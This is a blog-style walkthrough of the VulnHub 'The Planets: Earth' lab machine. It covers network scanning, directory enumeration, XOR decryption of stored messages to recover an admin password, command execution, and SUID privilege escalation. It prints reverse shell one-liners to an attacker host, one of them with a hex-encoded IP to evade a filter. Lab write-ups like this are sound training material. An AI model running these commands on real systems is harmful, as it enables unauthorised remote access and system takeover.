vulnhub THE PLANETS: EARTH Penetration Notes

Target machine download address: https://www.vulnhub.com/entry/the-planets-earth,755/#download

kali ip address

collect message
nmap -sP 192.168.20.0/24

Determine the ip address of the target machine

Scan for open ports

nmap -A -p 1-65535 192.168.20.131  

The waiting time is relatively long, we found that port 443 has dns analysis, let's modify the hosts file

Collect earth.local information

Find Previous Messages at the bottom of the page

 37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
    3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
    2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

scan the directory

dirb https://earth.local/

Found the admin directory, let's visit it

is a login screen

Collect terratest.earth.local information

Also let's scan the directory

dirb https://terratest.earth.local/

Found robots.txt let's visit

I don't know what the file format is for the last one, try adding a .txt to access it

The approximate meaning of successful access is as follows

Considerations for testing a secure messaging system:
*use XOR Encryption as an algorithm, in RSA It should be safe to use.
*Earth has confirmed that they have received our message.
*testdata.txt Used for testing encryption.
*terra Username to use as the admin portal.
to do:
*How do we securely send monthly keys to Earth?  Or should we change keys every week?
*Different key lengths need to be tested to prevent brute force attacks.  How long should the keys be?
*The interface for the messaging interface and admin panel needs to be improved, currently very basic.

Here we get the information - the encryption algorithm is XOR, and there is a testdata.txt file for testing encryption, the user name is terra, visit the reward information and save it

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

The general idea of ​​decryption is as follows

  • terra is the administrator username
  • Use XOR (exclusive OR) operation
  • It is necessary to perform an XOR operation on the Previous Messages on the home page and testdata.txt to decrypt it.
Exploitation of vulnerabilities (I don't know how to encrypt and decrypt, please don't spray)

Write a script, select a Previous Message data, and then perform XOR operation with testdata.txt to get the key

import binascii
c = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"

m = "According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."

m = binascii.b2a_hex(m.encode("utf-8"))#binascii.b2a_hex Returns the hexadecimal representation of binary data

result = hex(int(c,16) ^ int(m,16))

print(result)

Run to get the result

Decode it in hexadecimal


The password is earthclimatechangebad4humans. After the above text is decrypted, there are repeated contents, and then log in. The user name is terra, the password is earthclimatechangebad4humans, and the login address is https://earth.local/admin

found that the command can be executed

find find flag

find / -name "*flag*"

I found a flag.txt here, let's check it out

Rebound shell link target machine

bash -i >& /dev/tcp/192.168.20.130/1234 0>&1

Prohibit remote connection Try changing ip to hexadecimal

bash -i >& /dev/tcp/0xc0.0xa8.0x14.0x82/1234 0>&1

Before starting to execute, kali needs to listen to the port

The reverse shell is successful

Escalation of rights

View authorized commands

find / -perm -u=s -type f 2>/dev/null

Run reset_root:

There is an error, trying to reset the trigger failed

There is no debugging command locally, use nc to send it to the local debugging

Use strace to debug

Because there are no errors reported for the following three files, these three files were not found in the target machine, so create them in the target machine

Then run reset_root again

Finish

Tags: Linux Web Security network System Safety

Posted by TreeNode on Fri, 31 Mar 2023 22:12:11 +0530